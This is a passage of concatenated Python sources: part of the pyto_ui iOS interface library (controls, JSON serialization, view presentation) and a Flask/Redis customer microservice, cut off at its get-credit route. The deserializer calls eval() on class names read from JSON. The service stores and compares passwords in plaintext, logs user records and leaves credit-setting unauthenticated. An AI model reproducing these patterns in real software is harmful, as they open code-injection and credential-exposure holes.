name = "HORIZONTAL_ALIGNMENT_"+(self.horizontal_alignment.upper())
self.horizontal_alignment = globals()[name]
vertical_alignment = get("vertical_alignment")
if vertical_alignment is not None:
name = "VERTICAL_ALIGNMENT_"+(self.vertical_alignment.upper())
self.vertical_alignment = globals()[name]
def dictionary_representation(self):
r = super().dictionary_representation()
control = {
"enabled": self.enabled
}
for key in list(globals().keys()).copy():
if key.startswith("HORIZONTAL_ALIGNMENT_") and globals()[key] == self.horizontal_alignment:
control["horizontal_alignment"] = key.split("HORIZONTAL_ALIGNMENT_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("VERTICAL_ALIGNMENT_") and globals()[key] == self.vertical_alignment:
control["vertical_alignment"] = key.split("VERTICAL_ALIGNMENT_")[1].lower()
r["Control"] = control
return r
@property
def enabled(self) -> bool:
"""
A boolean indicating whether the control is enabled.
:rtype: bool
"""
return self.__py_view__.enabled
@enabled.setter
def enabled(self, new_value: bool):
self.__py_view__.enabled = new_value
@property
def horizontal_alignment(self) -> HORIZONTAL_ALIGNMENT:
"""
The horizontal alignment of the view's contents. See `Horizontal Alignment <constants.html#horizontal-alignment>`_ constants for possible values.
:rtype: `Horizontal Alignment <constants.html#horizontal-alignment>`_
"""
return self.__py_view__.contentHorizontalAlignment
@horizontal_alignment.setter
def horizontal_alignment(self, new_value: HORIZONTAL_ALIGNMENT):
self.__py_view__.contentHorizontalAlignment = new_value
@property
def vertical_alignment(self) -> VERTICAL_ALIGNMENT:
"""
The vertical alignment of the view's contents. See `Vertical Alignment <constants.html#vertical-alignment>`_ constants for possible values.
:rtype: `Vertical Alignment <constants.html#vertical-alignment>`_
"""
return self.__py_view__.contentVerticalAlignment
@vertical_alignment.setter
def vertical_alignment(self, new_value: VERTICAL_ALIGNMENT):
self.__py_view__.contentVerticalAlignment = new_value
@property
def action(self) -> Callable[[Control], None]:
"""
A function called when the control triggers its action.
For example, a :class:`Button` object calls this function when it's pressed.
Takes the :class:`Control` object as parameter.
:rtype: Callable[[Control], None]
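A minimal usage sketch (title and handler are illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def pressed(sender):
print(sender.title, "was pressed")
button = ui.Button(title="Press Me")
button.action = pressed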
"""
action = self.__py_view__.action
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@action.setter
def action(self, new_value: Callable[[Control], None]):
if new_value is None:
self.__py_view__.action = None
else:
self.__py_view__.action = _values.value(new_value)
class SegmentedControl(Control):
"""
A horizontal control made of multiple segments, each segment functioning as a discrete button.
The function passed to :data:`~pyto_ui.Control.action` will be called when the segmented control changes its selection.
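A minimal usage sketch (segment titles are illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def changed(sender):
print("Selected segment:", sender.selected_segment)
control = ui.SegmentedControl(["Foo", "Bar"])
control.action = changed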
"""
def __init__(self, segments: List[str] = []):
self.__py_view__ = __PySegmentedControl__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
self.segments = segments
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["SegmentedControl"]
except KeyError:
return
if "segments" in dictionary and dictionary["segments"] is not None:
self.segments = dictionary["segments"]
if "selection" in dictionary and dictionary["selection"] is not None:
self.selected_segment = dictionary["selection"]
def dictionary_representation(self):
r = super().dictionary_representation()
segmented_control = {
"segments": self.segments,
"selection": self.selected_segment
}
r["SegmentedControl"] = segmented_control
return r
@property
def segments(self) -> List[str]:
"""
A list of strings representing segments titles.
:rtype: List[str]
"""
return list(map(str, self.__py_view__.segments))
@segments.setter
def segments(self, new_value: List[str]):
self.__py_view__.segments = new_value
@property
def selected_segment(self) -> int:
"""
The index of selected segment.
:rtype: int
"""
return self.__py_view__.selectedSegmentIndex
@selected_segment.setter
def selected_segment(self, new_value: int):
self.__py_view__.selectedSegmentIndex = new_value
class Slider(Control):
"""
A control used to select a single value from a continuous range of values. The default range is located between ``0`` and ``1``.
The function passed to :data:`~pyto_ui.Control.action` will be called when the slider changes its value.
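A minimal usage sketch (the initial value is illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def changed(sender):
print("Value:", sender.value)
slider = ui.Slider(0.5)
slider.action = changed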
"""
def __init__(self, value: float = 0.5):
self.__py_view__ = __PySlider__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
self.value = value
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["Slider"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
self.value = get("value", default=0)
self.minimum_value = get("min", default=0)
self.maximum_value = get("max", default=1)
if get("thumb_color") is not None:
thumb_color = Color.__new__(Color)
thumb_color.configure_from_dictionary(get("thumb_color"))
self.thumb_color = thumb_color
if get("maximum_track_color") is not None:
maximum_track_color = Color.__new__(Color)
maximum_track_color.configure_from_dictionary(get("maximum_track_color"))
self.maximum_track_color = maximum_track_color
if get("minimum_track_color") is not None:
minimum_track_color = Color.__new__(Color)
minimum_track_color.configure_from_dictionary(get("minimum_track_color"))
self.minimum_track_color = minimum_track_color
def dictionary_representation(self):
r = super().dictionary_representation()
slider = {
"value": self.value,
"min": self.minimum_value,
"max": self.maximum_value
}
if self.thumb_color is not None:
slider["thumb_color"] = self.thumb_color.dictionary_representation()
if self.maximum_track_color is not None:
slider["maximum_track_color"] = self.maximum_track_color.dictionary_representation()
if self.minimum_track_color is not None:
slider["minimum_track_color"] = self.minimum_track_color.dictionary_representation()
r["Slider"] = slider
return r
def set_value_with_animation(self, value: float):
"""
Sets the value of the slider with an animation.
:param value: The value of the slider.
"""
self.__py_view__.setValue(value, animated=True)
@property
def value(self) -> float:
"""
The value of the slider between its range.
:rtype: float
"""
return self.__py_view__.value
@value.setter
def value(self, new_value: float):
self.__py_view__.value = new_value
@property
def minimum_value(self) -> float:
"""
The minimum value of the slider.
:rtype: float
"""
return self.__py_view__.minimumValue
@minimum_value.setter
def minimum_value(self, new_value: float):
self.__py_view__.minimumValue = new_value
@property
def maximum_value(self) -> float:
"""
The maximum value of the slider.
:rtype: float
"""
return self.__py_view__.maximumValue
@maximum_value.setter
def maximum_value(self, new_value: float):
self.__py_view__.maximumValue = new_value
@property
def minimum_track_color(self) -> Color:
"""
The color used to tint the default minimum track.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.minimumTrackColor
if c is None:
return None
else:
return Color(c)
@minimum_track_color.setter
def minimum_track_color(self, new_value: Color):
if new_value is None:
self.__py_view__.minimumTrackColor = None
else:
self.__py_view__.minimumTrackColor = new_value.__py_color__
@property
def maximum_track_color(self) -> Color:
"""
The color used to tint the default maximum track.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.maximumTrackColor
if c is None:
return None
else:
return Color(c)
@maximum_track_color.setter
def maximum_track_color(self, new_value: Color):
if new_value is None:
self.__py_view__.maximumTrackColor = None
else:
self.__py_view__.maximumTrackColor = new_value.__py_color__
@property
def thumb_color(self) -> Color:
"""
The color used to tint the default thumb.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.thumbColor
if c is None:
return None
else:
return Color(c)
@thumb_color.setter
def thumb_color(self, new_value: Color):
if new_value is None:
self.__py_view__.thumbColor = None
else:
self.__py_view__.thumbColor = new_value.__py_color__
class Switch(Control):
"""
A control that offers a binary choice, such as On/Off.
The function passed to :data:`~pyto_ui.Control.action` will be called when the switch changes its value.
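A minimal usage sketch:
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def changed(sender):
print("On" if sender.on else "Off")
switch = ui.Switch(on=True)
switch.action = changed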
"""
def __init__(self, on=False):
self.__py_view__ = __PySwitch__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
self.on = on
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["Switch"]
except KeyError:
return
if "on" in dictionary and dictionary["on"] is not None:
self.on = dictionary["on"]
if "on_color" in dictionary and dictionary["on_color"] is not None:
on_color = Color.__new__(Color)
on_color.configure_from_dictionary(dictionary["on_color"])
self.on_color = on_color
if "thumb_color" in dictionary and dictionary["thumb_color"] is not None:
thumb_color = Color.__new__(Color)
thumb_color.configure_from_dictionary(dictionary["thumb_color"])
self.thumb_color = thumb_color
def dictionary_representation(self):
r = super().dictionary_representation()
switch = {}
switch["on"] = self.on
if self.on_color is not None:
switch["on_color"] = self.on_color.dictionary_representation()
if self.thumb_color is not None:
switch["thumb_color"] = self.thumb_color.dictionary_representation()
r["Switch"] = switch
return r
def set_on_with_animation(self, on: bool):
"""
Sets the state of the switch to On or Off with an animation.
:param on: A boolean indicating whether the switch should be On.
"""
self.__py_view__.setOn(on, animated=True)
@property
def on(self) -> bool:
"""
A boolean indicating whether the switch is On.
:rtype: bool
"""
return self.__py_view__.isOn
@on.setter
def on(self, new_value: bool):
self.__py_view__.isOn = new_value
@property
def on_color(self) -> Color:
"""
The color used to tint the appearance of the switch when it is turned on.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.onColor
if c is None:
return None
else:
return Color(c)
@on_color.setter
def on_color(self, new_value: Color):
if new_value is None:
self.__py_view__.onColor = None
else:
self.__py_view__.onColor = new_value.__py_color__
@property
def thumb_color(self) -> Color:
"""
The color used to tint the appearance of the thumb.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.thumbColor
if c is None:
return None
else:
return Color(c)
@thumb_color.setter
def thumb_color(self, new_value: Color):
if new_value is None:
self.__py_view__.thumbColor = None
else:
self.__py_view__.thumbColor = new_value.__py_color__
class Button(Control):
"""
A control that executes your custom code in response to user interactions.
To add an action, set :data:`~pyto_ui.Control.action`.
For types of buttons, see `Button Type <constants.html#button-type>`_ constants.
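A minimal usage sketch (title and symbol name are illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
button = ui.Button(title="Delete")
button.image = ui.image_with_system_name("trash")
ui.show_view(button, ui.PRESENTATION_MODE_SHEET)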
"""
_button_type = None
def __init__(
self,
type: BUTTON_TYPE = __v__("BUTTON_TYPE_SYSTEM"),
title: str = "",
image: "Image" = None,
):
if type == "BUTTON_TYPE_SYSTEM":
self.__py_view__ = __PyButton__.newButtonWithType(BUTTON_TYPE_SYSTEM)
self._button_type = type
else:
self.__py_view__ = __PyButton__.newButtonWithType(type)
self.__py_view__.managedValue = _values.value(self)
self.title = title
self.image = image
self._setup_subclass()
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["Button"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
button_type = get("type")
if button_type is not None:
name = "BUTTON_TYPE_"+(button_type.upper())
self._button_type = globals()[name]
self.__py_view__ = __PyButton__.newButtonWithType(self._button_type)
self._setup_subclass()
self.title = get("title")
if get("color") is not None:
title_color = Color.__new__(Color)
title_color.configure_from_dictionary(get("color"))
self.title_color = title_color
if get("font") is not None:
font = Font.__new__(Font)
font.configure_from_dictionary(get("font"))
self.font = font
if get("image") is not None:
if os.path.isfile(get("image")):
self.image = Image.open(get("image"))
else:
self.image = image_with_system_name(get("image"))
def dictionary_representation(self):
r = super().dictionary_representation()
button = {
"title": self.title
}
if self.title_color is not None:
button["color"] = self.title_color.dictionary_representation()
if self.font is not None:
button["font"] = self.font.dictionary_representation()
if self.image is not None and isinstance(self.image, Image.Image):
button["image"] = self.image.filename
for key in list(globals().keys()).copy():
if key.startswith("BUTTON_TYPE_") and globals()[key] == self._button_type:
button["type"] = key.split("BUTTON_TYPE_")[1].lower()
r["Button"] = button
return r
@property
def title(self) -> str:
"""
The title of the button.
:rtype: str
"""
title = self.__py_view__.title
if title is not None:
return str(title)
else:
return None
@title.setter
def title(self, new_value: str):
self.__py_view__.title = new_value
@property
def title_color(self) -> Color:
"""
The color of the title.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.titleColor
if c is None:
return None
else:
return Color(c)
@title_color.setter
def title_color(self, new_value: Color):
if new_value is None:
self.__py_view__.titleColor = None
else:
self.__py_view__.titleColor = new_value.__py_color__
@property
def image(self) -> "Image.Image":
"""
The image displayed on the button. Can be a ``PIL`` image or a ``UIKit`` symbol image. For more information about symbols, see :func:`~pyto_ui.image_with_system_name`.
:rtype: PIL.Image.Image
"""
ui_image = self.__py_view__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
_image = None
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_view__.image = None
self._image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_view__.image = new_value
else:
self._image = new_value
self.__py_view__.image = __ui_image_from_pil_image__(new_value)
@property
def font(self) -> Font:
"""
The font to be applied to the text.
:rtype: pyto_ui.Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
class TextField(Control):
"""
A field for typing a single line of text.
The function passed to :data:`~pyto_ui.Control.action` will be called when the text field changes its text.
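A minimal usage sketch (the placeholder and keyboard type are illustrative):
.. highlight:: python
.. code-block:: python
import pyto_ui as ui
def changed(sender):
print("Text:", sender.text)
field = ui.TextField(placeholder="Email")
field.keyboard_type = ui.KEYBOARD_TYPE_EMAIL_ADDRESS
field.action = changed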
"""
def __init__(self, text: str = "", placeholder: str = None):
self.__py_view__ = __PyTextField__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
self.text = text
self.placeholder = placeholder
if callable(self.did_begin_editing):
self.__py_view__.didBeginEditing = _values.value(self.did_begin_editing)
if callable(self.did_end_editing):
self.__py_view__.didEndEditing = _values.value(self.did_end_editing)
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["TextView"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(key, _dict, default)
self.placeholder = tuple(get("placeholder", default=""))
self.text = get("text", default="")
self.smart_quotes = get("smart_quotes", default=True)
self.smart_dashes = get("smart_dashes", default=True)
self.autocorrection = get("autocorrection", default=True)
self.secure = get("secure", default=False)
if get("color") is not None:
color = Color.__new__(Color)
color.configure_from_dictionary(get("color"))
self.text_color = color
if get("font") is not None:
font = Font.__new__(Font)
font.configure_from_dictionary(get("font"))
self.font = font
text_alignment = get("text_alignment")
if text_alignment is not None:
name = "TEXT_ALIGNMENT_"+(text_alignment.upper())
self.text_alignment = globals()[name]
keyboard_type = get("keyboard_type")
if keyboard_type is not None:
name = "KEYBOARD_TYPE_"+(keyboard_type.upper())
self.keyboard_type = globals()[name]
keyboard_appearance = get("keyboard_appearance")
if keyboard_appearance is not None:
name = "KEYBOARD_APPEARANCE__"+(keyboard_appearance.upper())
self.keyboard_appearance = globals()[name]
autocapitalization_type = get("autocapitalization_type")
if autocapitalization_type is not None:
name = "AUTO_CAPITALIZE_"+(autocapitalization_type.upper())
self.autocapitalization_type = globals()[name]
return_key_type = get("return_key_type")
if return_key_type is not None:
name = "RETURN_KEY_TYPE_"+(return_key_type.upper())
self.return_key_type = globals()[name]
border_style = get("border_style")
if border_style is not None:
name = "TEXT_FIELD_BORDER_STYLE_"+(border_style.upper())
self.border_style = globals()[name]
def dictionary_representation(self):
r = super().dictionary_representation()
text_field = {
"text": self.text,
"placeholder": self.placeholder,
"smart_quotes": self.smart_quotes,
"smart_dashes": self.smart_dashes,
"autocorrection": self.autocorrection,
"secure": self.secure
}
for key in list(globals().keys()).copy():
if key.startswith("KEYBOARD_TYPE_") and globals()[key] == self.keyboard_type:
text_field["keyboard_type"] = key.split("KEYBOARD_TYPE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("KEYBOARD_APPEARANCE__") and globals()[key] == self.keyboard_appearance:
text_field["keyboard_appearance"] = key.split("KEYBOARD_APPEARANCE__")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("AUTO_CAPITALIZE_") and globals()[key] == self.autocapitalization_type:
text_field["autocapitalization_type"] = key.split("AUTO_CAPITALIZE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("RETURN_KEY_TYPE_") and globals()[key] == self.return_key_type:
text_field["return_key_type"] = key.split("RETURN_KEY_TYPE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("TEXT_FIELD_BORDER_STYLE_") and globals()[key] == self.border_style:
text_field["border_style"] = key.split("TEXT_FIELD_BORDER_STYLE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("TEXT_ALIGNMENT_") and globals()[key] == self.text_alignment:
text_field["alignment"] = key.split("TEXT_ALIGNMENT_")[1].lower()
if self.text_color is not None:
text_field["color"] = self.text_color.dictionary_representation()
if self.font is not None:
text_field["font"] = self.font.dictionary_representation()
r["TextField"] = text_field
return r
@property
def border_style(self) -> TEXT_FIELD_BORDER_STYLE:
"""
The border style of the Text Field.
:rtype: TEXT_FIELD_BORDER_STYLE
"""
return self.__py_view__.borderStyle
@border_style.setter
def border_style(self, new_value: TEXT_FIELD_BORDER_STYLE):
self.__py_view__.borderStyle = new_value
@property
def did_begin_editing(self) -> Callable[[TextField], None]:
"""
A function called when the Text Field begins editing. Takes the sender Text Field as parameter.
:rtype: Callable[[TextField], None]
"""
action = self.__py_view__.didBeginEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_begin_editing.setter
def did_begin_editing(self, new_value: Callable[[TextField], None]):
if new_value is None:
self.__py_view__.didBeginEditing = None
else:
self.__py_view__.didBeginEditing = _values.value(new_value)
@property
def did_end_editing(self) -> Callable[[TextField], None]:
"""
A function called when the Text Field ends editing. Takes the sender Text Field as parameter.
:rtype: Callable[[TextField], None]
"""
action = self.__py_view__.didEndEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_end_editing.setter
def did_end_editing(self, new_value: Callable[[TextField], None]):
if new_value is None:
self.__py_view__.didEndEditing = None
else:
self.__py_view__.didEndEditing = _values.value(new_value)
@property
def text(self) -> str:
"""
The text contained in the Text Field.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def placeholder(self) -> str:
"""
A gray text shown when there is no text.
:rtype: str
"""
return str(self.__py_view__.placeholder)
@placeholder.setter
def placeholder(self, new_value: str):
self.__py_view__.placeholder = new_value
@property
def text_color(self) -> Color:
"""
The color of the text displayed on screen.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text displayed on screen.
:rtype: pyto_ui.Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The alignment of the text displayed on screen. See `Text Alignment <constants.html#text-alignment>`_ constants for possible values.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def smart_dashes(self) -> bool:
"""
A boolean indicating whether smart dashes are enabled.
:rtype: bool
"""
return self.__py_view__.smartDashes
@smart_dashes.setter
def smart_dashes(self, new_value: bool):
self.__py_view__.smartDashes = new_value
@property
def smart_quotes(self) -> bool:
"""
A boolean indicating whether smart quotes are enabled.
:rtype: bool
"""
return self.__py_view__.smartQuotes
@smart_quotes.setter
def smart_quotes(self, new_value: bool):
self.__py_view__.smartQuotes = new_value
@property
def keyboard_type(self) -> KEYBOARD_TYPE:
"""
The type of keyboard to use while editing the text. See `Keyboard Type <constants.html#keyboard-type>`_ constants for possible values.
:rtype: `Keyboard Type <constants.html#keyboard-type>`_
"""
return self.__py_view__.keyboardType
@keyboard_type.setter
def keyboard_type(self, new_value: KEYBOARD_TYPE):
self.__py_view__.keyboardType = new_value
@property
def autocapitalization_type(self) -> AUTO_CAPITALIZE:
"""
The type of autocapitalization to use while editing the text. See `Auto Capitalization <constants.html#auto-capitalization>`_ constants for possible values.
:rtype: `Auto Capitalization <constants.html#auto-capitalization>`_
"""
return self.__py_view__.autocapitalizationType
@autocapitalization_type.setter
def autocapitalization_type(self, new_value: AUTO_CAPITALIZE):
self.__py_view__.autocapitalizationType = new_value
@property
def autocorrection(self) -> bool:
"""
A boolean indicating whether autocorrection is enabled.
:rtype: bool
"""
return self.__py_view__.autocorrection
@autocorrection.setter
def autocorrection(self, new_value: bool):
self.__py_view__.autocorrection = new_value
@property
def keyboard_appearance(self) -> KEYBOARD_APPEARANCE:
"""
The appearance of the keyboard used while editing the text. See `Keyboard Appearance <constants.html#keyboard-appearance>`_ constants for possible values.
:rtype: `Keyboard Appearance <constants.html#keyboard-appearance>`_
"""
return self.__py_view__.keyboardAppearance
@keyboard_appearance.setter
def keyboard_appearance(self, new_value: KEYBOARD_APPEARANCE):
self.__py_view__.keyboardAppearance = new_value
@property
def return_key_type(self) -> RETURN_KEY_TYPE:
"""
The type of return key to show on the keyboard used to edit the text. See `Return Key Type <constants.html#return-key-type>`_ constants for possible values.
:rtype: `Return Key Type <constants.html#return-key-type>`_
"""
return self.__py_view__.returnKeyType
@return_key_type.setter
def return_key_type(self, new_value: RETURN_KEY_TYPE):
self.__py_view__.returnKeyType = new_value
@property
def secure(self) -> bool:
"""
A boolean indicating whether the keyboard should be configured to enter sensitive data. The text entered by the user will be hidden.
:rtype: bool
"""
return self.__py_view__.isSecureTextEntry
@secure.setter
def secure(self, new_value: bool):
self.__py_view__.isSecureTextEntry = new_value
##################
# MARK: - Serialization
##################
def _from_json(obj):
if "class" in obj and isinstance(obj["class"], str):
full_class_name = obj["class"]
if "." in full_class_name:
parts = full_class_name.split(".")
class_name = parts[-1]
del parts[-1]
module = ".".join(parts)
klass = getattr(sys.modules[module], class_name)
else:
try:
klass = getattr(sys.modules["__main__"], full_class_name)
except AttributeError:
                klass = globals().get(full_class_name)
if klass is None:
klass = eval(full_class_name)
view = klass.__new__(klass)
view.configure_from_dictionary(obj)
return view
else:
return obj
class Encoder(json.JSONEncoder):
def default(self, o):
return o.dictionary_representation()
class Decoder(json.JSONDecoder):
def __init__(self):
super().__init__(object_hook=_from_json)
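# Illustrative round-trip sketch (not from the original source): serializing a
# view to JSON with Encoder and rebuilding it with Decoder. This assumes the
# view implements dictionary_representation() and configure_from_dictionary(),
# which is what Encoder.default() and _from_json() rely on.
def _example_serialization_roundtrip(view: View) -> View:
    data = json.dumps(view, cls=Encoder)  # -> JSON via dictionary_representation()
    return Decoder().decode(data)  # -> View via _from_json / configure_from_dictionary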
###################
# MARK: - Functions
###################
def font_family_names() -> List[str]:
"""
Returns all font family names that can be used to initialize a font.
:rtype: List[str]
"""
names = __UIFont__.familyNames
py_names = []
for name in names:
py_names.append(str(name))
return py_names
def image_with_system_name(name: str) -> UIImage:
"""
    Returns a system symbol image from the given name. The return value is a UIKit ``UIImage`` object, so it can only be used with the ``pyto_ui`` library.
    More info about symbols is available on `Apple's Web Site <https://developer.apple.com/design/resources/>`_ .
:param name: The name of the SF Symbol.
:rtype: UIImage
"""
check(name, "name", [str])
image = UIImage.systemImageNamed(name, withConfiguration=None)
if image is None:
raise ValueError("The given symbol name is not valid.")
return image
def show_view(view: View, mode: PRESENTATION_MODE):
"""
Presents the given view.
This function doesn't return until the view is closed. You can use another thread to perform background tasks and modify the UI after it's presented.
On iPad, if the view has a custom size, it will be used for the presentation.
:param view: The :class:`~pyto_ui.View` object to present.
:param mode: The presentation mode to use. The value will be ignored on a widget. See `Presentation Mode <constants.html#presentation-mode>`_ constants for possible values.
"""
check(view, "view", [View])
check(mode, "mode", [int])
def show(view, mode):
view.__py_view__.presentationMode = mode
try:
ConsoleViewController.showView(
view.__py_view__,
onConsoleForPath=threading.current_thread().script_path,
)
except AttributeError:
ConsoleViewController.showView(view.__py_view__, onConsoleForPath=None)
while view.__py_view__.isPresented:
sleep(0.2)
if (
"__editor_delegate__" in dir(builtins)
and builtins.__editor_delegate__ is not None
):
global show_view
_show_view = show_view
show_view = show
try:
builtins.__editor_delegate__.show_ui(view, mode)
return
except NotImplementedError:
pass
finally:
show_view = _show_view
show(view, mode)
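# Illustrative usage sketch: show_view() blocks until the view is closed, so
# any UI update after presentation must come from another thread. The constant
# names PRESENTATION_MODE_SHEET and COLOR_RED and the 'background_color'
# attribute are assumptions about the surrounding module, not verified here.
def _example_present(view: View):
    def update_later():
        sleep(1)
        view.background_color = COLOR_RED  # assumed color constant
    threading.Thread(target=update_later).start()
    show_view(view, PRESENTATION_MODE_SHEET)  # returns once the sheet is dismissed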
def show_view_controller(view_controller: "UIViewController"):
"""
    Shows a UIKit View Controller. This function must be called from the main thread.
See `Objective-C <Objective-C.html>`_ and `mainthread <mainthread.html>`_.
:param view_controller: UIViewController.
"""
if not NSThread.currentThread.isMainThread:
raise RuntimeError(
"'show_view_controller' must be called from the app's main thread. See the 'mainthread' module."
)
try:
ConsoleViewController.showVC(
view_controller, onConsoleForPath=threading.current_thread().script_path
)
except AttributeError:
ConsoleViewController.showVC(view_controller, onConsoleForPath=None)
def pick_color() -> Color:
"""
Picks a color with the system color picker and returns it.
Requires iOS 14.
:rtype: pyto_ui.Color
"""
UIDevice = ObjCClass("UIDevice")
if (
UIDevice is not None
and float(str(UIDevice.currentDevice.systemVersion).split(".")[0]) < 14
):
raise NotImplementedError("The color picker requires iOS 14.")
script_path = None
try:
script_path = threading.current_thread().script_path
except AttributeError:
pass
color = ConsoleViewController.pickColorWithScriptPath(script_path)
if color is None:
return None
else:
return Color(color)
def pick_font(size: float = None) -> Font:
"""
Picks a font with the system font picker and returns it.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int, None])
script_path = None
try:
script_path = threading.current_thread().script_path
except AttributeError:
pass
font = ConsoleViewController.pickFontWithScriptPath(script_path)
if font is None:
return None
else:
pyFont = Font("", 0)
pyFont.__ui_font__ = font
if size is not None:
pyFont = pyFont.with_size(size)
return pyFont
# MARK: - Toga
if "sphinx" in sys.modules:
iOSBox = object
class toga:
class Box:
pass
class _PytoBox(iOSBox):
def __init__(self, view, interface):
self.pyto_view = view
super().__init__(interface=interface)
def create(self):
self.native = self.pyto_view.__py_view__.managed
# Add the layout constraints
self.add_constraints()
class TogaWidget(toga.Box):
"""
A Toga Widget created from a PytoUI view.
Pass a :class:`~pyto_ui.View` as the first parameter of the initializer.
"""
def __init__(self, view: View, id=None, style=None, children=None, factory=None):
super().__init__(id=id, style=style, factory=factory)
self._children = []
if children:
self.add(*children)
# Create a platform specific implementation of a Box
self._impl = _PytoBox(view=view, interface=self)
|
customer.py
|
'''
Customer Service. Provides the Customer API as described in index().
2018 Ayhan AVCI.
mailto: ayhanavci@gmail.com
https://lain.run
https://github.com/ayhanavci/
'''
from flask import Flask
from flask import request
from flask import json
from flask import jsonify
import redis
import requests
import os
import pika
import threading
import datetime
import uuid
import asyncio
app = Flask(__name__)
redis_db = redis.StrictRedis(host=os.environ["DATABASE_IP"],
password=os.environ["DATABASE_PASSWORD"],
port=os.environ["DATABASE_PORT"],
db=0)
@app.route('/', methods=['GET'])
def index():
services = {
"login-user": {
"UserName": "String",
"Password": "String"
},
"add-user": {
"UserName": "String",
"Password": "String",
"FullName": "String",
"Email": "String",
"Credit": "String"
},
"update-user": {
"UserName": "String",
"Password": "String",
"FullName": "String",
"Email": "String",
"Credit": "String"
},
"get-user": {
"UserName": "String"
},
"get-all-users": {
},
"get-credit": {
"UserName": "String"
},
"set-credit": {
"UserName": "String",
"Credit": "String"
}
}
return jsonify(services=services), 200
@app.route('/login-user/', methods=['POST'])
def login_user():
user_name = request.json['UserName']
password = request.json['Password']
result = { "Status": "Success"}
if not redis_db.exists(user_name):
result = { "Status": "User Not Found"}
else:
print(redis_db.get(user_name))
user_data = json.loads(redis_db.get(user_name))
if user_data['Password'] != password:
result = { "Status": "Wrong password"}
return jsonify(result=result), 200
@app.route('/add-user/', methods=['POST'])
def add_user():
user_name = request.json['UserName']
if redis_db.exists(user_name):
result = { "Status": "User already exists"}
else:
store_data = {}
store_data['Action'] = "Add New Customer"
store_data['UserName'] = request.json['UserName']
store_data['FullName'] = request.json['FullName']
store_data['Password'] = request.json['Password']
store_data['Email'] = request.json['Email']
store_data['Credit'] = request.json['Credit']
send_event_store_data("add_customer", store_data)
result = { "Status": "Success"}
return jsonify(result=result), 200
@app.route('/update-user/', methods=['POST'])
def update_user():
user_name = request.json['UserName']
if not redis_db.exists(user_name):
result = { "Status": "User not found"}
else:
user_data = json.loads(redis_db.get(user_name))
store_data = {}
store_data['Action'] = "Update Customer"
store_data['UserName'] = request.json['UserName']
store_data['FullName'] = request.json['FullName']
store_data['Password'] = request.json['Password']
store_data['Email'] = request.json['Email']
store_data['Credit'] = user_data['Credit'] #Preserve credit
send_event_store_data("update_customer", store_data)
print("update_user:{0}".format(store_data['Action']))
result = { "Status": "Success"}
return jsonify(result=result), 200
@app.route('/set-credit/', methods=['POST'])
def set_credit():
user_name = request.json['UserName']
result = { "Status": "Success"}
if not redis_db.exists(user_name):
result = { "Status": "User not found"}
else:
user_data = json.loads(redis_db.get(user_name))
store_data = {}
store_data['Action'] = "Set Credit"
store_data['UserName'] = user_data['UserName']
store_data['FullName'] = user_data['FullName']
store_data['Password'] = user_data['Password']
store_data['Email'] = user_data['Email']
store_data['Credit'] = request.json['Credit'] #Only update credit
send_event_store_data("set_credit", store_data)
return jsonify(result="result"), 200
@app.route('/get-credit/', methods=['GET'])
